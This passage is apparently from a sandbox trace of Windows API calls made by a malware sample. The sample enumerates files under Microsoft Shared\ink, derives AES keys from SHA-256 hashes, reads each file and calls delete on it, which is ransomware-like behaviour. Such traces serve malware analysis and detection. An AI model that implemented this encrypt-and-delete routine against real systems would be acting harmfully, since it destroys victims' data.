lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0138.496] CryptDestroyHash (hHash=0x284d628) returned 1 [0138.496] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0138.496] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.497] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml")) returned 0 [0138.497] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.498] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.498] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.498] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oskmenubase.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskmenubase.xml", lpUsedDefaultChar=0x0) returned 16 [0138.498] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.499] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.499] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.499] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.499] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d7 [0138.499] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.500] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.500] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.500] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.502] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml")) returned 0 [0138.502] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0138.502] FindClose (in: hFindFile=0x284d5a8 | out: hFindFile=0x284d5a8) returned 1 [0138.502] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oskmenu.xml", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskmenu.xml", lpUsedDefaultChar=0x0) returned 12 [0138.502] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0138.503] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0138.503] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.503] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0138.503] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd7 [0138.503] ReadFile (in: hFile=0x418, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0138.504] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0138.504] CryptDestroyKey (hKey=0x284d668) returned 1 [0138.504] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.506] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml")) returned 0 [0138.506] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.506] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.506] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.506] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="osknumpadbase.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknumpadbase.xml", lpUsedDefaultChar=0x0) returned 18 [0138.507] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.507] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.507] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.507] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0138.507] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x59d [0138.508] ReadFile (in: hFile=0x418, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.510] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.510] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0138.510] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.510] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml")) returned 0 [0138.511] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0138.511] FindClose (in: hFindFile=0x284d628 | out: hFindFile=0x284d628) returned 1 [0138.511] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="osknumpad.xml", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknumpad.xml", lpUsedDefaultChar=0x0) returned 14 [0138.512] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0138.513] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0138.513] CryptHashData (hHash=0x284d628, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.513] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0138.513] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdb [0138.513] ReadFile (in: hFile=0x414, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0138.514] CryptDestroyHash (hHash=0x284d628) returned 1 [0138.514] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0138.514] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.515] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml")) returned 0 [0138.515] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.516] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.516] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.516] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oskpredbase.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskpredbase.xml", lpUsedDefaultChar=0x0) returned 16 [0138.516] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.517] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.517] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.517] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.517] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39c [0138.517] ReadFile (in: hFile=0x414, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.519] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.519] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.519] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.520] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml")) returned 0 [0138.520] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0138.521] FindClose (in: hFindFile=0x284d5a8 | out: hFindFile=0x284d5a8) returned 1 [0138.521] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oskpred.xml", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskpred.xml", lpUsedDefaultChar=0x0) returned 12 [0138.524] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0138.525] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0138.525] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.525] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0138.525] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd7 [0138.525] ReadFile (in: hFile=0x40c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0138.527] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0138.527] CryptDestroyKey (hKey=0x284d668) returned 1 [0138.527] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.528] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml")) returned 0 [0138.528] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.528] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.528] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.528] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ea-sym.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ea-sym.xml", lpUsedDefaultChar=0x0) returned 11 [0138.529] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.530] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.530] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.530] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0138.530] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ed [0138.530] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.532] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.532] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0138.532] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.533] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml")) returned 0 [0138.533] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ja-jp-sym.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ja-jp-sym.xml", lpUsedDefaultChar=0x0) returned 14 [0138.535] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.536] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.536] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.536] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0138.536] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ed [0138.536] ReadFile (in: hFile=0x414, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.538] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.538] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0138.538] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.540] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml")) returned 0 [0138.540] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="symbase.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="symbase.xml", lpUsedDefaultChar=0x0) returned 12 [0138.540] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.541] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.541] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.541] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0138.541] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xacc [0138.541] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.543] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.543] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0138.543] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.544] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml")) returned 0 [0138.544] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0138.544] FindClose (in: hFindFile=0x284d628 | out: hFindFile=0x284d628) returned 1 [0138.544] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="symbols.xml", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="symbols.xml", lpUsedDefaultChar=0x0) returned 12 [0138.546] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0138.546] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0138.546] CryptHashData (hHash=0x284d628, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.546] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0138.546] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24f [0138.546] ReadFile (in: hFile=0x418, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0138.548] CryptDestroyHash (hHash=0x284d628) returned 1 [0138.548] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0138.548] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.549] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml")) returned 0 [0138.549] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.550] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.550] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.550] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="webbase.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webbase.xml", lpUsedDefaultChar=0x0) returned 12 [0138.551] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.551] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.551] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.551] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.551] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x48e [0138.551] ReadFile (in: hFile=0x418, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.554] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.554] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.555] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.556] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml")) returned 0 [0138.556] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0138.556] FindClose (in: hFindFile=0x284d5a8 | out: hFindFile=0x284d5a8) returned 1 [0138.556] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="web.xml", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="web.xml", lpUsedDefaultChar=0x0) returned 8 [0138.557] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0138.558] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0138.558] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.558] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0138.558] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcf [0138.558] ReadFile (in: hFile=0x414, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0138.559] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0138.559] CryptDestroyKey (hKey=0x284d668) returned 1 [0138.559] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.561] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml")) returned 0 [0138.561] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0138.561] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0138.561] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.561] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.561] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.561] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0138.561] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0138.561] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0138.561] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.562] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.562] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.562] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: 